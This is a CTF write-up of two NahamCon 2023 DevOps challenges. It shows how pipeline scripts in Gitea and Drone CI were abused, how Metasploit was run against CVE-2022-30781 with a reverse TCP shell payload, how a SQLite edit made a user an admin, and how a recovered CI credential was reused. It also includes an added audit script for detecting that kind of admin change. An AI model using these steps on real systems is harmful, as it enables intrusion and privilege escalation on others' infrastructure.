NahamCon CTF 2023 Devops Challenge Writeup
DevOps challenge writeups: Pirates and Supplier.
NahamCon is a free virtual offensive security conference hosted on Twitch, and it also runs a CTF, NahamCon CTF 2023.
NahamCon CTF always delivers good challenges for CTF enthusiasts like me. This year I didn't participate much in categories other than DevOps. There were only two DevOps challenges this year, and I hope to see more next year.
This year my team at Vantage Point Security Indonesia and I finished 10th on the scoreboard.
I wrote this writeup after seeing other writeups on the Discord. After reading some of them, I can say my approach is a little different. Both challenges use Gitea as the base application.
Pirates (medium)
You are given some URLs, a username, and a password for the Gitea application. After logging in, you will find a repository named Tortuga.
My attention goes straight to the drone.yml file.
---
kind: pipeline
type: exec
name: to pirate

platform:
  os: linux
  arch: amd64

steps:
  - name: to pirate
    commands:
      - ./piratize.sh

trigger:
  event:
    - push
  branch:
    - main

---
kind: signature
hmac: 213aae557e24814352839440ca22083810dfd95237da16e573115ca050823ac6

...
In summary, the steps will be executed whenever there is a push to the main branch.
Edit piratize.sh to:
#!/bin/sh
cat /flag.txt
pirate README_ENG.md > README.md
git add README.md
git commit -m "Automatic translation [CI SKIP]"
git push --set-upstream origin main
Create a new branch and open a pull request, but an error stops me:
This Pull Request doesn’t have enough approvals yet. 0 of 1 approvals granted.
The pipeline will not run until there is a merge into the main branch, so in order to merge the code we must have at least 1 approval.
Exploit Phase
What I did was exploit the Gitea instance with CVE-2022-30781.
There are two ways to exploit this CVE, the hard way and the simple way. The hard way is to recreate the HTTP service manually: configure an endpoint that pretends to be a Gitea instance.
For example:
Request -> /api/v1/version
Response -> {"version": "1.16.0"}
reference:
The easier way is to use Metasploit installed on a server; for this you definitely need a VPS.
msf6 > use exploit/multi/http/gitea_git_fetch_rce
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 30299
RPORT => 30299
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS challenge.nahamcon.com
RHOSTS => challenge.nahamcon.com
msf6 exploit(multi/http/gitea_git_fetch_rce) > set USERNAME jack
USERNAME => jack
msf6 exploit(multi/http/gitea_git_fetch_rce) > set PASSWORD Bu7!^zTZ
PASSWORD => Bu7!^zTZ
msf6 exploit(multi/http/gitea_git_fetch_rce) > set PAYLOAD linux/x64/shell/reverse_tcp
PAYLOAD => linux/x64/shell/reverse_tcp
I found the Gitea database and configuration under /data/gitea. gitea.db is a SQLite3 file, so I extracted the db file and inspected it using https://sqliteonline.com/
Update user jack to the admin role:
sqlite3 gitea.db
UPDATE user SET is_admin='1' WHERE id=4;
.exit
Refresh the page; as an admin, jack can merge the pull request.
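The privilege escalation above works by flipping a single column in gitea.db. As an added defensive example (not part of the original writeup, and not Gitea's own code), the following Python script audits a Gitea-style SQLite user table against an allowlist of expected admins; the table layout and the accounts seeded into it are constructed to mimic the writeup's database, not taken from it.

```python
import sqlite3

# Constructed stand-in for Gitea's user table: only the columns the audit
# needs. The real gitea.db has many more columns; is_admin is the one the
# writeup flips.
SCHEMA = """
CREATE TABLE user (
    id       INTEGER PRIMARY KEY,
    name     TEXT NOT NULL UNIQUE,
    is_admin INTEGER NOT NULL DEFAULT 0
);
"""
# Constructed accounts; jack gets id 4 to mirror the writeup's UPDATE.
SEED = [(1, "gitea-admin", 1), (2, "captain", 0), (3, "droneci", 0), (4, "jack", 0)]


def open_demo_db():
    """Build an in-memory copy of the constructed table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SEED)
    conn.commit()
    return conn


def current_admins(conn):
    """Return the set of usernames whose is_admin flag is set."""
    rows = conn.execute("SELECT name FROM user WHERE is_admin = 1 ORDER BY name")
    return {r[0] for r in rows}


def audit_admins(conn, expected):
    """Compare the live admin set with an allowlist.

    Returns (unexpected, missing): accounts that hold admin without being on
    the allowlist, and allowlisted admins that have lost the flag.
    """
    live = current_admins(conn)
    return live - set(expected), set(expected) - live


if __name__ == "__main__":
    db = open_demo_db()
    allowlist = {"gitea-admin"}
    print("before:", audit_admins(db, allowlist))  # (set(), set())
    # Replay the writeup's direct DB edit against the constructed table.
    db.execute("UPDATE user SET is_admin='1' WHERE id=4;")
    db.commit()
    print("after:", audit_admins(db, allowlist))  # ({'jack'}, set())
```

Run against a copy of the real gitea.db (`sqlite3.connect("gitea.db")`) the same audit flags any account that gained admin outside the expected set, which is the state the writeup's UPDATE leaves behind.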
Go to http://drone.challenge.nahamcon.com:30299/
Solved
Post Exploitation Phase
Get a reverse shell on the runner server.
I did some recon and found this credential; later on it can be used on the Supplier challenge:
droneci:t4K0@s!qSF
Supplier (hard)
You are given some URLs, a username, and a password for the Gitea application. After logging in, you will find a repository named infra.
My attention goes straight to the drone.yml file, so I can learn how this pipeline works.
kind: pipeline
type: exec
name: default

platform:
  os: linux
  arch: amd64

trigger:
  event:
    - cron

steps:
  - name: tf_plan
    commands:
      - make plan
So there is already a cron job that triggers the steps. What we want to exploit is changing the content of the Makefile, so that when the event fires the payload is executed through the make plan command.
Exploit Phase
I tried to edit the Makefile, but I can't, because the repository settings require that we fork it and possibly open a pull request.
I tried to fork, but got this error:
The owner has already reached the limit of 0 repositories.
To solve this, I tried a different approach. I thought maybe the challenge creator didn't change the droneci credential across all the DevOps challenges. And my thought worked out perfectly!
This is what I found earlier in the Pirates challenge:
droneci:t4K0@s!qSF
So the droneci user can commit directly into the repository; just add cat /flag.txt to the Makefile.
Solved
That's it. I hope you learned something from this simple writeup. Thank you for reading!